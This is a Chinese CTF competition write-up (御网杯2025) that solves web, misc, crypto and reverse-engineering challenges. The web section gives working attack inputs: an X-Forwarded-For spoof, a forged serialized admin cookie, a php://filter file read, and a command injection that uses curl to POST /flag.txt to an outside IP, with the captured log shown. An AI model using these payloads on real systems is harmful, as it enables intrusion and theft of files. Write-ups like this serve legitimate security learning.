御网杯2025 wp by ENOCH
最后得分2240
全国排名大概在七百多的样子
web
YWB_Web_xff
// Excerpt of the challenge's login handler; the branch below runs only for POST requests.
if ($_SERVER["REQUEST_METHOD"] == "POST") {
// HTTP_X_FORWARDED_FOR is the X-Forwarded-For request header. The client (or any
// intermediate proxy) sets it, so the value read here is caller-controlled.
$cip = $_SERVER["HTTP_X_FORWARDED_FOR"];
// The only gate shown in this excerpt: a loose (==) comparison of that header with a
// fixed address. NOTE(review): a header value is not proof of origin. An IP-based check
// would normally use $_SERVER['REMOTE_ADDR'] and honour X-Forwarded-For only when the
// request arrives from a known reverse proxy.
if ($cip == "2.2.2.1") {
echo '<div class="success">';
echo '<h2>登录成功!</h2>';
// Read the flag file and print it, HTML-escaped, inside flag{...}.
$flag = file_get_contents('/flag.txt');
echo '<p>flag{' . htmlspecialchars($flag) . '}</p>';
echo '</div>';
}
可以通过添加X-Forwarded-For头来绕过:该请求头由客户端提供,服务端直接拿它与 2.2.2.1 比较,所以在 POST 请求中带上 X-Forwarded-For: 2.2.2.1 即可通过校验。
YWB_Web_未授权访问
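查看cookies发现有url编码的PHP序列化数据(解码后形如 O:5:"Admin":2:{s:4:"name";s:5:"admin";s:7:"isAdmin";b:1;})
修改name和isAdmin字段后重新url编码并设置为cookies即可。从现象看,服务端直接信任了客户端Cookie里反序列化出来的权限字段,没有做签名或完整性校验。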
O%3A5%3A%22Admin%22%3A2%3A%7Bs%3A4%3A%22name%22%3Bs%3A5%3A%22admin%22%3Bs%3A7%3A%22isAdmin%22%3Bb%3A1%3B%7D
easyweb
命令执行没有回显,所以用curl把 /flag.txt 的内容POST到自己的服务器,再在服务器端的请求日志里查看即可
cmd=curl -d @/flag.txt http://8.138.179.228:9999
Request Method: POST
User-Agent: curl/7.74.0
Accept: */*
Content-Length: 18
Content-Type: application/x-www-form-urlencoded
Request Args: ImmutableMultiDict([])
Request Form Data: ImmutableMultiDict([('flag{d4ek6s7kzztx}', '')])
Request JSON Data: None
47.105.113.86 - - [11/May/2025 10:22:17] "POST / HTTP/1.1" 200 -
YWB_Web_命令执行过滤绕过
?cmd=readfile('php://filter/read=convert.base64-encode/resource=/tmp/flag.nisp');
反序列化
<?php
/**
 * Prints the serialized form of a mylogin object with the credentials the
 * challenge expects. Properties are declared as user, then pass, and they
 * appear in that order in the serialized string.
 *
 * NOTE(review): the page does not show the receiving code; presumably it
 * passes request data to unserialize() and compares these two fields.
 */
class mylogin {
    public $user;
    public $pass;
}

$login = new mylogin();
$login->user = "1";
$login->pass = "myzS@11wawq"; // must match exactly
echo serialize($login);
?>
O:7:"mylogin":2:{s:4:"user";s:1:"1";s:4:"pass";s:11:"myzS@11wawq";}
misc
ez_xor
明显是xor,但是不知道密钥
爆破出密钥即可
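# Single-byte XOR recovery using the known "flag{" plaintext prefix.
cipher = "5f-55-58-5e-42-71-7a-6d-7f-48-4e-5c-78-6a-7d-08-0d-0f-44"
cipher_bytes = bytes.fromhex(cipher.replace('-', ''))
known_prefix = b"flag{"

# Known-plaintext step: XOR of the first ciphertext byte with the first
# expected plaintext byte gives the key byte (0x5f ^ ord('f') == 0x39).
xor_key = cipher_bytes[0] ^ known_prefix[0]

# Confirm the one-byte-key assumption against the whole prefix. The length is
# taken from known_prefix rather than hard-coded, and the check raises
# explicitly so it is not stripped when Python runs with -O.
prefix_guess = bytes(b ^ xor_key for b in cipher_bytes[:len(known_prefix)])
if prefix_guess != known_prefix:
    raise ValueError("密钥不匹配")

# Apply the same key byte to every ciphertext byte.
plain = bytes(b ^ xor_key for b in cipher_bytes)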
print(f"解密结果: {plain.decode('utf-8')}")
flag{HCTFqweASD146}
被折叠的显影图纸
直接随波逐流发现有flag{}字样
光隙中的寄生密钥
图片里隐写了一个zip
爆破密码即可
内容16进制转ascii然后base64解码
misc
10进制转字符: M1BMSkhDNFQ2Z2hWbWJLREZ5cXd2VWtQTFVNVzVFb0U=
混合解码结果:synt{UAPGSQFaDfY1QCmSa}
Rot13解码: flag{HNCTFDSnQsL1DPzFn}
套娃
先zip解压然后zip解压
最后在word\document.xml中找到了flag
密码
cry_rsa
# RSA parameters given by the challenge (p and q are assumed to be prime).
p, q = 473398607161, 4511491
e = 19

# Euler's totient of n = p * q.
phi = (p - 1) * (q - 1)

# Private exponent: the modular inverse of e modulo phi
# (three-argument pow with a negative exponent, Python 3.8+).
d = pow(e, -1, phi)

# The flag value is the private exponent plus 4.
flag = d + 4
print("flag{" + str(flag) + "}")
#flag{2023326077889096383}
草甸方阵的密语
先栅栏密码分7栏
然后凯撒密码解密
gift
五一劳动节爸爸给家里人带了一个礼物。由于礼物不好拿,所以把礼物平均分成了四份,但是其中一份不小心掉在地上散落成了无数片,变成了 1 - 1/3 + 1/5 - 1/7 + …
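聪明的你能算出或猜出爸爸带的礼物是什么吗?flag示例: flag{apple} flag{watermelon} 提交flag值凯撒密码加密,偏移量9再提交。
计算发现是π:1 - 1/3 + 1/5 - 1/7 + … 是莱布尼茨级数,和为 π/4;它是四等份中的一份,所以整个礼物是 π。
π 谐音英文单词 pie(原文写作 pai,但按偏移量9只有 pie 才能得到下面的 yrn),凯撒密码偏移量9:p→y,i→r,e→n
所以flag是flag{yrn}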
easy-签到题
ciphey一把梭
得到的16进制字符转成ascii即可
baby-rsa
根据题目q、p的性质(相邻素数),二者都非常接近 √N,从 isqrt(N) 向下逐个试除即可分解 N(这也说明RSA的两个素数不能取得过于接近),可以写出以下脚本
from Crypto.Util.number import long_to_bytes
import gmpy2
# Public RSA parameters given by the challenge: modulus, public exponent, ciphertext.
N = 12194420073815392880989031611545296854145241675320130314821394843436947373331080911787176737202940676809674543138807024739454432089096794532016797246441325729856528664071322968428804098069997196490382286126389331179054971927655320978298979794245379000336635795490242027519669217784433367021578247340154647762800402140321022659272383087544476178802025951768015423972182045405466448431557625201012332239774962902750073900383993300146193300485117217319794356652729502100167668439007925004769118070105324664379141623816256895933959211381114172778535296409639317535751005960540737044457986793503218555306862743329296169569
e = 65537
c = 4504811333111877209539001665516391567038109992884271089537302226304395434343112574404626060854962818378560852067621253927330725244984869198505556722509058098660083054715146670767687120587049288861063202617507262871279819211231233198070574538845161629806932541832207041112786336441975087351873537350203469642198999219863581040927505152110051313011073115724502567261524181865883874517555848163026240201856207626237859665607255740790404039098444452158216907752375078054615802613066229766343714317550472079224694798552886759103668349270682843916307652213810947814618810706997339302734827571635179684652559512873381672063

# Step 1: the integer square root of N. The two primes are expected to be
# neighbours, so the smaller one lies at or just below this value.
root = gmpy2.isqrt(N)

# Step 2: walk downwards from the root inside a bounded window, looking for a divisor.
q = None
for offset in range(2000):
    candidate = root - offset
    if N % candidate != 0:
        continue
    q = candidate
    p = N // q
    # Stop only when the cofactor is exactly the prime that follows q;
    # otherwise keep scanning (q and p stay set to the last divisor found).
    if p == gmpy2.next_prime(q):
        break

# Step 3: sanity-check the factorisation before using it.
assert q is not None, "分解失败"
assert p * q == N, "分解错误"
print(f"分解成功: q = {q}\np = {p}")

# Step 4: private exponent from Euler's totient.
phi = (p - 1) * (q - 1)
d = gmpy2.invert(e, phi)

# Step 5: decrypt, strip surrounding whitespace and decode to text.
m = pow(c, d, N)
# The last step swaps every '8' for '9' in the decoded text; the page does not
# say why (presumably a requirement of the challenge statement).
flag = long_to_bytes(m).strip().decode().replace('8', '9')
print(flag)
逆向
signin
先upx脱壳
一个简单的rc4加密
按照逻辑将密文以及密钥提取出来即可
from Crypto.Cipher import ARC4
# 密钥处理(小端序转换)
def qword_to_le_bytes(qword):
    """Return *qword* as a byte string in little-endian order.

    The value is rendered as hex zero-padded to 16 digits, parsed into
    bytes (most significant first) and reversed, so a value below 2**64
    yields exactly 8 bytes.
    """
    big_endian = bytes.fromhex(format(qword, "016x"))
    return bytes(reversed(big_endian))
# Key material: four 64-bit constants (names follow the author's v1..v4 labels),
# each laid out in little-endian byte order.
v1 = (
    0xB8C6B89FC8B99FC8,
    0xCFB7B0C51443528F,
    0xB1A8C6B99BC7AC9C,
    0xBDC68AB3C59299C5,
)
# -1499806587 as a 32-bit two's-complement value is 0xA69AC485,
# i.e. bytes 85 C4 9A A6 in little-endian order.
v2 = (-1499806587).to_bytes(4, 'little', signed=True)
# 4 * 8 bytes from v1 plus 4 bytes from v2: a 36-byte key.
key = b''.join(map(qword_to_le_bytes, v1)) + v2

# Ciphertext: three full 64-bit words first (24 bytes) ...
v3 = (
    0xC44745F289B15A46,
    0xBA8BB14D62D35502,
    0xB528D46C87D08D0A,
)
# ... then the first 7 little-endian bytes of v4[0] = 0xA56220992C994B26
# (26 4B 99 2C 99 20 62) ...
v4_part1 = qword_to_le_bytes(0xA56220992C994B26)[:7]
# ... and the 8 bytes written at offset 7, which overlap the last byte of v4[0]:
# 0x2AC19853F3F7A5 in little-endian order, zero-padded to 8 bytes.
overlap = bytes.fromhex("A5F7F35398C12A00")
# 24 + 7 + 8 = 39 bytes in total.
encrypted = b''.join(map(qword_to_le_bytes, v3)) + v4_part1 + overlap

# RC4 decryption applies the same keystream XOR as encryption, so the key and
# ciphertext recovered from the binary are all that is needed.
plaintext = ARC4.new(key).decrypt(encrypted)
print("Decrypted Flag:", plaintext.decode('ascii'))
这比赛估计也有个几百名的水分,但是比起著名的pycc已经好很多了
题目web,misc,密码都挺简单
逆向有点难,只出了一题
pwn则是压根不会。。。